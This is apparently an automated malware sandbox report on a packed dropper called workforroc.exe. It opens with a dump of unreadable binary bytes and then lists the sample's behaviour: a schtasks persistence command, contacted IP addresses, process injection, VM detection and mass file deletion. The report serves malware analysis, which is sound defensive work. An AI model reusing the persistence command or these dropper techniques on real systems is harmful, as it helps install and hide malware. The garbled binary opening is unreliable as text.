ÆÆ[ÃÆÆ[ÃÆWSPè9ëÄ~~r Æ8Æ[ÃÆÆ8Æ[ÃÌÌÌÌÌÌÌÌÌxHrÆÃxrÃÌÌÌÌÌÌÌhpCèû ÌÌÌÌÌÌPègYÃÌÌÌÌÌÌÌÌUìjÿhP4Cd¡PìSVW¡LC3ÅPEôd£eðùMùI$ v h$pCèV w+7¸$I÷îÖÁúÂÁèÂ;ÁèyÇEüuOVPEèèO7Mì+Î¸$I÷éÑÁúÚÁëÄÚöt$;uìt¤$èûÿÿÆ;uìuóQèÄEÅ+ÐEèÝ+ÓOOMôd Y_^[å]ÂUèRèRÄjjèºÌÌÌÌÌÌÌÌÌH+¸$I÷éÑÁúÂÁèÂÃÌÌÌÌÌÌÌH+¸$I÷éÑÁúÂÁèÂÃÌÌÌÌÌÌÌ¸I$ ÃÌÌÌÌÌÌÌÌÌÌH+¸$I÷éÑÁúÂÁèÂÈÑéºI$ +Ñ;Ðs3ÀëÁ;ÆsÆÃÌÌÌÌÌÌÌÌÌÌÌÌh$pCèÞÌÌÌÌÌÌUl$VW}ñ;ûs hpCè +û;Çsø;õuÈÿè?Ã3Éè6_Æ^]Âÿþv h8pCèF;ÇsFPWVèÿtj¸9Er)Më&ÿuí~ør _ÆÆ^]Â_Æ^Æ]ÂÍ9FrëÆWËQPè_èÄ~~rÆ8_Æ^]ÂÆÆ8_Æ^]ÂÌÌÌÌÌÌÌþþv h8pCèéH;ÎsHQVPèï3Ò;ÖÀ÷ØÃöu pùrÆ3Ò;ÖÀ÷ØÃÌÌÌÌÌÌÌÌÌÌÌÌöt)PúrëÈ;ñrúrëÈ@Á;Æv°Ã2ÀÃh8pCènÌÌÌÌÌÌWøF;Ás hpCè¡+Á;ÇsøÿtLVSúrëÞúrëÖ+ÇÙPßÑSRè¦ FÄ+Ç~F[r ÆÆ_ÃÎÆÆ_Ã¸þÿÿÿÃÌÌÌÌÌÌÌÌÌÌUìjÿhð3Cd¡PìSVW¡LC3ÅPEôd£eðE}ðÎþþvðë'_¸«ªªª÷æËÑéÑê;Êv¸þÿÿÿ+Á4;Øv¾þÿÿÿ3ÀNEü;ÈvùÿwQè=ÄÀtEëLMìQMÜÇEìèfh ~CUÜRÇEÜBCèpEHeðEèÆEüèÊE¸¿@Ã}uè]ÛtrëÇSPEPè-æÄrQè©ÄEÆw_þrøÆMôd Y_^[å]Âu~rRèhÄjÇFÇFjÆè¿ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÈÿÃÌÌÌÌÌÌÌÌÌÌÌÌjÿh4Cd¡PS¡LC3ÄPD$d£3ÀD$;ÈtAÇAD$PÈÿ3ÛèJüÿÿL$d Y[ÄÃÌÌÌÌÌÌÌÌÌ2ÀÃÌÌÌÌÌÌÌÌÌÌÌÌÌD$PQL$èáÄÂÌÌÌÌÌÌÌÌÌÌÌVð;÷tètöÿÿÆ;÷uô^ÃÌÌÌÌÌÌÌÌÌÌÌì3ÀÉtNùI$ wÍ+ÁÀÀPèfÄÀu,$QL$ÇD$èh ~CT$RÇD$BCèÄÃÌÌÌÌÌì3ÀÉt>ùÿw QèÄÀu,$PL$ÇD$èBh ~CL$QÇD$BCèJÄÃÌÌÌÌÌD$VPñèÕÇBCÆ^ÂÌÌÌÌÌÌÌjÿh4Cd¡PS¡ request_handle: 0x00cc000c	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0074ca00', u'virtual_address': u'0x00002000', u'entropy': 7.928226294675877, u'name': u'.text', u'virtual_size': u'0x0074c8c4'}

entropy

7.92822629468

description

A section with a high entropy has been found

entropy

0.999732495151

description

Overall entropy of this PE file is high

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	chcp 1251
cmdline	schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

Communicates with host for which no DNS query was performed (3 events)

host	185.172.128.109
host	185.172.128.90
host	5.42.64.33

Attempts to identify installed AV products by installation directory (1 event)

file	C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe

Installs itself for autorun at Windows startup (1 event)

cmdline

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

Network activity contains more than one unique useragent (2 events)

process	InstallSetup9.exe				useragent	NSIS_Inetc (Mozilla)
process	rty25.exe				useragent	HTTPREAD

Drops 110 unknown file mime types indicative of ransomware writing encrypted files back to disk (50 out of 110 events)

file	C:\Windows\Prefetch\SDIAGNHOST.EXE-8D72177C.pf
file	c:\Windows\Temp\fwtsqmfile01.sqm
file	C:\Windows\Prefetch\CSC.EXE-BE9AC2DF.pf
file	c:\Windows\Temp\fwtsqmfile00.sqm
file	C:\Windows\Prefetch\RUNDLL32.EXE-87432CEE.pf
file	C:\Windows\Prefetch\RUNDLL32.EXE-7BCB21A1.pf
file	C:\Windows\Prefetch\TOOLSPUB1.EXE-62D9747A.pf
file	C:\Windows\Prefetch\INJECT-X64.EXE-AAEEB6EB.pf
file	C:\Windows\Prefetch\Layout.ini
file	C:\Windows\Prefetch\LOGONUI.EXE-09140401.pf
file	C:\Users\test22\AppData\Local\Temp\~DF8C0F100C7231519A.TMP
file	C:\Windows\Prefetch\IEXPLORE.EXE-908C99F8.pf
file	C:\Windows\Prefetch\SETUP.EXE-A9A86358.pf
file	C:\Windows\Prefetch\SEARCHINDEXER.EXE-4A6353B9.pf
file	C:\Windows\Prefetch\SVCHOST.EXE-CF79EE4C.pf
file	C:\Windows\Prefetch\WORKFORROC.EXE-2F91F4D3.pf
file	C:\Windows\Prefetch\SEARCHFILTERHOST.EXE-77482212.pf
file	C:\Windows\Prefetch\MAINTENANCESERVICE.EXE-FA0B1B99.pf
file	C:\Windows\Prefetch\PING.EXE-7E94E73E.pf
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\uglified_jindo[1].js
file	C:\Windows\Prefetch\IS32BIT.EXE-9A90D66E.pf
file	C:\Windows\Prefetch\ReadyBoot\Trace9.fx
file	C:\Windows\Prefetch\SETUP-STUB.EXE-8F842224.pf
file	C:\Users\test22\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
file	C:\Windows\Prefetch\DLLHOST.EXE-40DD444D.pf
file	C:\Windows\Prefetch\MSIEXEC.EXE-A2D55CB6.pf
file	C:\Windows\Prefetch\REGSVR32.EXE-8461DBEE.pf
file	C:\Windows\Prefetch\ReadyBoot\Trace1.fx
file	C:\Windows\Prefetch\CONHOST.EXE-1F3E9D7E.pf
file	C:\Windows\Prefetch\AgGlGlobalHistory.db
file	C:\Windows\Prefetch\DEFAULT-BROWSER-AGENT.EXE-01C82E17.pf
file	C:\Windows\Prefetch\INSTALLSETUP9.EXE-BA053EC2.pf
file	C:\Users\test22\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
file	C:\Windows\Prefetch\DEFRAG.EXE-588F90AD.pf
file	C:\Windows\Prefetch\ReadyBoot\Trace8.fx
file	C:\Windows\Prefetch\CMD.EXE-AC113AA8.pf
file	C:\Windows\Prefetch\WMIADAP.EXE-F8DFDFA2.pf
file	C:\Windows\Prefetch\CONTROL.EXE-817F8F1D.pf
file	C:\Windows\Prefetch\SVCHOST.EXE-5901D5E8.pf
file	C:\Windows\Prefetch\MMC.EXE-561C5A40.pf
file	C:\Windows\Prefetch\CMD.EXE-4A81B364.pf
file	C:\Windows\Prefetch\MOBSYNC.EXE-C5E2284F.pf
file	C:\Windows\Prefetch\MSCORSVW.EXE-90526FAC.pf
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\MSIMGSIZ.DAT
file	C:\Windows\Prefetch\W32TM.EXE-1101AF41.pf
file	C:\Windows\Prefetch\INJECT-X64.EXE-7E2195F2.pf
file	C:\Windows\Prefetch\MSCORSVW.EXE-57D17DAF.pf
file	C:\Windows\Prefetch\7ZG.EXE-0F8C4081.pf
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000009.log
file	C:\Windows\Prefetch\SVCHOST.EXE-A1476A17.pf

Deletes a large number of files from the system indicative of ransomware, wiper malware or system destruction (50 out of 985 events)

file	C:\Users\test22\AppData\Local\Temp\SetupExe(20200504224110B04).log
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\dthumb[10].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\dthumb[3].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1F4WQUHZ\dropbox_logo_text_2015-vfld7_dJ8[1].svg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\013[1].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\sprite-20210713@2x[2].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\7028d2d448816aeaab0e_20211029092933036[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\spr_lft_white_150916[1].png
file	C:\Windows\Prefetch\WORKFORROC.EXE-2F91F4D3.pf
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\AdPostInjectAsync[1].nhn
file	c:\Windows\Temp\fwtsqmfile01.sqm
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\dthumbCAUKPFFO.jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\m_920_294_0729[1].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\cropImg_196x196_38699317823237099[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\e84a7e15-e6a9-41ec-9eb7-883e9b5e7249[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\348acc74d7ad9acbdda7_20211101182838273[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\1_237[1].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\favicon[3].png
file	C:\Windows\Prefetch\WMIADAP.EXE-F8DFDFA2.pf
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\dthumb[9].jpg
file	C:\Windows\Prefetch\SVCHOST.EXE-80F4A784.pf
file	C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548_000_vcRuntimeMinimum_x64.log
file	C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\desktop.ini
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\jquery-1.12.4.min_v1[1].js
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\w[1].css
file	C:\Windows\Prefetch\MAINTENANCESERVICE.EXE-FA0B1B99.pf
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\S6uyw4BMUTPHjx4wWA[1].woff
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\CURBIYE7\icon_spacer-vflN3BYt2[1].gif
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\3a7f4c4cb962a54fae75_20200728093632144[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\cropImg_728x360_77691188554226350[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\8c9b6e5b-4abb-45c6-9aa7-aa28806e8e84[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\TopNav[1].js
file	C:\Windows\Prefetch\CONTROL.EXE-817F8F1D.pf
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\adf7905c-28ea-4ddf-93b2-aa96dad57752[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\977[1].png
file	C:\Windows\Prefetch\MSCORSVW.EXE-90526FAC.pf
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\015[1].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\dthumbCAR5WT7S.jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\smart_editor2.me.min.200716[1].css
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\ipsec[3].htm
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\nsd13728808[1].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\327[1].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\sample-doc-download[1].htm
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\SOC-Facebook[1].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\f[2].txt
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\images[1].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\f1e83251-9248-4d4e-8d2e-d1505a55bc83[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\3de5642a-2629-4625-9a63-d96768537b11[1].jpg
file	C:\Users\test22\AppData\Local\Temp\workforroc.exe

Detects VirtualBox through the presence of a file (1 event)

file	C:\Windows\Prefetch\VBOXDRVINST.EXE-7DCD6070.pf

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

5.42.64.33:80

Executed a process and injected code into it, probably while unpacking (36 events)

Time & API	Arguments	Status	Return
NtResumeThread Jan. 30, 2024, 7:51 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2548	1	0
NtResumeThread Jan. 30, 2024, 7:51 a.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 2548	1	0
NtResumeThread Jan. 30, 2024, 7:51 a.m.	thread_handle: 0x0000018c suspend_count: 1 process_identifier: 2548	1	0
NtResumeThread Jan. 30, 2024, 7:51 a.m.	thread_handle: 0x00000208 suspend_count: 1 process_identifier: 2548	1	0
CreateProcessInternalW Jan. 30, 2024, 7:51 a.m.	thread_identifier: 2640 thread_handle: 0x00000394 process_identifier: 2636 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\InstallSetup9.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\InstallSetup9.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\InstallSetup9.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000039c	1	1
NtResumeThread Jan. 30, 2024, 7:51 a.m.	thread_handle: 0x00000338 suspend_count: 1 process_identifier: 2548	1	0
NtGetContextThread Jan. 30, 2024, 7:51 a.m.	thread_handle: 0x000000e4	1	0
NtGetContextThread Jan. 30, 2024, 7:51 a.m.	thread_handle: 0x000000e4	1	0
NtResumeThread Jan. 30, 2024, 7:51 a.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 2548	1	0
NtResumeThread Jan. 30, 2024, 7:51 a.m.	thread_handle: 0x0000039c suspend_count: 1 process_identifier: 2548	1	0
CreateProcessInternalW Jan. 30, 2024, 7:51 a.m.	thread_identifier: 2696 thread_handle: 0x000003a8 process_identifier: 2692 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\toolspub1.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\toolspub1.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\toolspub1.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003c4	1	1
NtGetContextThread Jan. 30, 2024, 7:51 a.m.	thread_handle: 0x000000e4	1	0
NtGetContextThread Jan. 30, 2024, 7:51 a.m.	thread_handle: 0x000000e4	1	0
NtResumeThread Jan. 30, 2024, 7:51 a.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 2548	1	0
NtGetContextThread Jan. 30, 2024, 7:51 a.m.	thread_handle: 0x000000e4	1	0
NtGetContextThread Jan. 30, 2024, 7:51 a.m.	thread_handle: 0x000000e4	1	0
NtGetContextThread Jan. 30, 2024, 7:51 a.m.	thread_handle: 0x000000e4	1	0
NtSetContextThread Jan. 30, 2024, 7:51 a.m.	registers.eip: 1921133444 registers.esp: 4322064 registers.edi: 43478856 registers.eax: 69284968 registers.ebp: 4322088 registers.edx: 1 registers.ebx: 22 registers.esi: 1625471 registers.ecx: 130 thread_handle: 0x000000e4 process_identifier: 2548	1	0
NtResumeThread Jan. 30, 2024, 7:51 a.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 2548	1	0
NtResumeThread Jan. 30, 2024, 7:51 a.m.	thread_handle: 0x0000039c suspend_count: 1 process_identifier: 2548	1	0
CreateProcessInternalW Jan. 30, 2024, 7:51 a.m.	thread_identifier: 2740 thread_handle: 0x00000204 process_identifier: 2736 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003b0	1	1
NtResumeThread Jan. 30, 2024, 7:51 a.m.	thread_handle: 0x000001f8 suspend_count: 1 process_identifier: 2548	1	0
CreateProcessInternalW Jan. 30, 2024, 7:51 a.m.	thread_identifier: 2792 thread_handle: 0x00000208 process_identifier: 2788 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\rty25.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\rty25.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\rty25.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003c0	1	1
CreateProcessInternalW Jan. 30, 2024, 7:51 a.m.	thread_identifier: 2900 thread_handle: 0x000001e8 process_identifier: 2896 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\BroomSetup.exe filepath_r: stack_pivoted: 0 creation_flags: 67108864 (CREATE_DEFAULT_ERROR_MODE) inherit_handles: 0 process_handle: 0x000001b0	1	1
CreateProcessInternalW Jan. 30, 2024, 7:51 a.m.	thread_identifier: 2800 thread_handle: 0x00000204 process_identifier: 2804 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\nsqFF70.tmp filepath_r: stack_pivoted: 0 creation_flags: 67108864 (CREATE_DEFAULT_ERROR_MODE) inherit_handles: 0 process_handle: 0x0000029c	1	1
CreateProcessInternalW Jan. 30, 2024, 7:51 a.m.	thread_identifier: 1964 thread_handle: 0x0000028c process_identifier: 940 current_directory: C:\Users\test22\AppData\Roaming\Temp\ filepath: track: 1 command_line: "C:\Users\test22\AppData\Roaming\Temp\Task.bat" filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000298	1	1
NtResumeThread Jan. 30, 2024, 7:51 a.m.	thread_handle: 0x000002ac suspend_count: 1 process_identifier: 2896	1	0
NtResumeThread Jan. 30, 2024, 7:51 a.m.	thread_handle: 0x000002bc suspend_count: 1 process_identifier: 2896	1	0
NtResumeThread Jan. 30, 2024, 7:51 a.m.	thread_handle: 0x000002ec suspend_count: 1 process_identifier: 2896	1	0
CreateProcessInternalW Jan. 30, 2024, 7:51 a.m.	thread_identifier: 0 thread_handle: 0x00000000 process_identifier: 0 current_directory: filepath: track: 0 command_line: c filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000000		0
CreateProcessInternalW Jan. 30, 2024, 7:51 a.m.	thread_identifier: 0 thread_handle: 0x00000000 process_identifier: 0 current_directory: filepath: track: 0 command_line: c filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000000		0
CreateProcessInternalW Jan. 30, 2024, 7:51 a.m.	thread_identifier: 0 thread_handle: 0x00000000 process_identifier: 0 current_directory: filepath: track: 0 command_line: c filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000000		0
NtResumeThread Jan. 30, 2024, 7:51 a.m.	thread_handle: 0x00000300 suspend_count: 1 process_identifier: 2896	1	0
CreateProcessInternalW Jan. 30, 2024, 7:51 a.m.	thread_identifier: 0 thread_handle: 0x00000000 process_identifier: 0 current_directory: filepath: track: 0 command_line: c filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000000		0
CreateProcessInternalW Jan. 30, 2024, 7:51 a.m.	thread_identifier: 2108 thread_handle: 0x00000088 process_identifier: 2116 current_directory: C:\Users\test22\AppData\Roaming\Temp filepath: C:\Windows\System32\chcp.com track: 1 command_line: chcp 1251 filepath_r: C:\Windows\system32\chcp.com stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW Jan. 30, 2024, 7:51 a.m.	thread_identifier: 148 thread_handle: 0x00000084 process_identifier: 196 current_directory: C:\Users\test22\AppData\Roaming\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1

workforroc.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All